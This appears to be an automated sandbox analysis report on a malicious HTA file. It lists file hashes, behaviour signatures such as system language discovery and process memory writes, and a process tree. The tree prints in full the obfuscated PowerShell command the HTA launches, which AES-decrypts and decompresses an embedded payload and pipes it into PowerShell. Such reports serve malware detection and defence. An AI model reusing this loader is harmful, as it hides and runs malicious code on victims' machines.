Analysis

  • max time kernel
    121s
  • max time network
    125s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    09/09/2024, 16:04

General

  • Target

    b (1).hta

  • Size

    67KB

  • MD5

    efdae93cb31dc54c3d87779cd4492a66

  • SHA1

    28e7c6c449170c4f64b660dfa83049e34cea5c06

  • SHA256

    b48b6b38768b5e6003b7c9412f3aeeb0bf74126f01e356691b7508c13a1b7e68

  • SHA512

    8192f1eb0b3147fb6f01b369c9d67904c0a19168a512d8f6414822cdaa2da01ec322d7c8e3a105e897fb33c0150e195f1e2584c31ce84aa7a367d50454f9c091

  • SSDEEP

    1536:KSe9JyrL3EZo/3mgZgqS2P/kPERYSGZ9hJbqbo+UKfy5R9q4sIhuS7:s9JMLTy5jq0h97

Score
6/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\b (1).hta"
    1⤵
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:2340
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $qehKI = 'AAAAAAAAAAAAAAAAAAAAAKpb10JU5zqcFcVdH2geSO5Vp9uj/iqeY+0Qki/qmQT54wZbmcYZYVZOaEmW6jJnmrbPSh2F+WQCVgF51b1qJnbr4jXWbTueNjXiH2RHc2vUi73dzWKvn2mPC2cJ0WzhHHP/yYPeVKvSwKvPd44du2l+tiUac3MwJe/dcb4EHQ8PCtyYvNnL2/j/PCx9dDeUKNorCC1HPpUgA3ciLHn7RThEyJoG3xdM/zHvQcbu0/Fpi50GSpyll+wJCHspPe2vMpjbswOsgIWbv/ofkDPwccTAycpWCC0+kFjxMvhUrgWNNM98SPSgaUQ/JA7tm5bh7kZLdwgjc4Zc1DwOfWdzHuO8NrslSnbplJa6c3RfvVp6D/JPNCfTffzySoN2KcksVKJ4rpcgZJjYk8t/+Xi7o4hCUuYldmRgYdGgxaxGCiyf+2yG4gEBvJLkWQoqn1nsgCsh6kklCkWucmt8hmJtlAsMOXWEQjAagBi3bS7SDp3fAtLQ2QcHoBhFRA56EHVmWrvKJH+KIcOSwOLF/F2bMnLz7Vut2Ap7AXSqdp9OiEBUMlQAYlfvhS0EnsDltjV9exyhBXrJ1gnPmcXLcESKg28sZZ06kvcwEtbowP/y4BO7lPCqjbVF+rl/mjFdzO2ppg==';$HCHPRCW = 'T1JjU3RWVG5NalFZbk14Z2dEaUVRc2NaQWVSUlNRV1I=';$HPEewZLk = New-Object 'System.Security.Cryptography.AesManaged';$HPEewZLk.Mode = [System.Security.Cryptography.CipherMode]::ECB;$HPEewZLk.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$HPEewZLk.BlockSize = 128;$HPEewZLk.KeySize = 256;$HPEewZLk.Key = [System.Convert]::FromBase64String($HCHPRCW);$QdOvC = [System.Convert]::FromBase64String($qehKI);$PXXSjDtl = $QdOvC[0..15];$HPEewZLk.IV = $PXXSjDtl;$hvADggCjF = $HPEewZLk.CreateDecryptor();$WHUJrcPzX = $hvADggCjF.TransformFinalBlock($QdOvC, 16, $QdOvC.Length - 16);$HPEewZLk.Dispose();$SHPaFOQZ = New-Object System.IO.MemoryStream( , $WHUJrcPzX );$URyqaN = New-Object System.IO.MemoryStream;$lKJOTEDLn = New-Object System.IO.Compression.GzipStream $SHPaFOQZ, ([IO.Compression.CompressionMode]::Decompress);$lKJOTEDLn.CopyTo( $URyqaN );$lKJOTEDLn.Close();$SHPaFOQZ.Close();[byte[]] $VYaSrbX = $URyqaN.ToArray();$uISMRic = [System.Text.Encoding]::UTF8.GetString($VYaSrbX);$uISMRic | powershell -
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1800
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2500

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    f6468acced877b4d26fac7eb3fda0698

    SHA1

    bb4a5bb3e1f68565480ebc163f8587d483eba4f4

    SHA256

    626047a983529764869d78656d3dd874151d44bde3e6edf2f020be828df142b0

    SHA512

    01e3684e049c93e5fb7874d8893fae35ad2f497962c1030c71f134dabc7ae3f7be746c673b0eba1f44ceff5218ec603489b538237b30de59ec9ef3ba0f026bd1